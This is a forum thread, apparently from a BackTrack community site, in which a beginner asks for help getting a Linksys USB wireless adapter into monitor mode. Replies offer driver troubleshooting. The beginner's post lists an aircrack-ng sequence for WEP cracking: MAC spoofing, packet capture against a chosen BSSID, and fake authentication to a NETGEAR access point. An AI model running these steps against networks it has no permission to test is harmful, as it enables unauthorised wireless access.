Thread: my lynksis wusb54gc wont authenticate

Just burned his ISO

Default my lynksis wusb54gc wont authenticate

iam a new to this so help me out please my usb linksys wusb54gc wont authenticate iam running backtrack 3 on vmware my laptop is a hp amd turion 64 with 4 gigs of ram 300 gig hardrive ...the reason that iam running it from vmware is because when i try to boot from a cd it just frezzez it never passes the boot screen well lets see if anyone can help me

The card is supported out of the box in BT3F and as it is a USB device it should also work in Vmware without problems. Therefore the origin of the problem can most likely be found in the commands you use. Please post the full commands that you use along with other relevant information and I’ll try to help you out.
    -Monkeys are like nature's humans.

Just burned his ISO

Default this is what iam doing

first i check if wireless assistant picks up my usb and it does
    airmong-ng
    airmong-ng stop rausb0
    ifconfig rausb0
    macchanger --mac 00:11:22:33:44:55
    airmong-ng start rausb0
    airodump-ng rausb0
    -----in here another screen shoulg open with the networks that it picked up but is does not work what i have to do is unplug by usb and plug it back in
    -know i copy the BSSID AND REMEBER THE CHANNEL#
    airodump-ng -c (11-channel #) -w wepfile --bssid 00:33:$$:44:@2:77 rausb0
    open SHELL 2 EXAMPLE BSSID
    AIREPLAY-NG -1 0 -A 00:33:$$:44:@2:77 -H 00:11:22:33:44:55 -E NETGEAR rausb0
    after this it never assosietes

airodump-ng rausb0
    -----in here another screen shoulg open with the networks that it picked up but is does not work what i have to do is unplug by usb and plug it back in
    By this do you mean that airodump-ng does not pick up any wireless networks? If this is the case it indicates that your card is not properly put into monitor mode. Try the following command instead of airmon-ng start rausb0 and then check if airodump-ng works:
    Code:
    iwconfig rausb0 mode monitor
    Also there is no need to physically disconnect and re-connect the USB device, the following commands will unload and re-load the driver for you, which will achieve the same result.
    Code:
    rmmod rt73
    modprobe rt73
    This is assuming my memory serves me right and your card uses the rt73 driver.

EDIT:I also located the following thread which I believe might be of help to you as the very same wireless card is discussed:
    http://forums.remote-exploit.org/showthread.php?p=85006
    -Monkeys are like nature's humans.

Just burned his ISO

Also there is no need to physically disconnect and re-connect the USB device, the following commands will unload and re-load the driver for you...

Don't forget to:
    Code:
    ifconfig rausb0 down
    before
    Code:
    rmmod rt73
    modprobe rt73
    otherwise, it will likely tell you that the module is in use.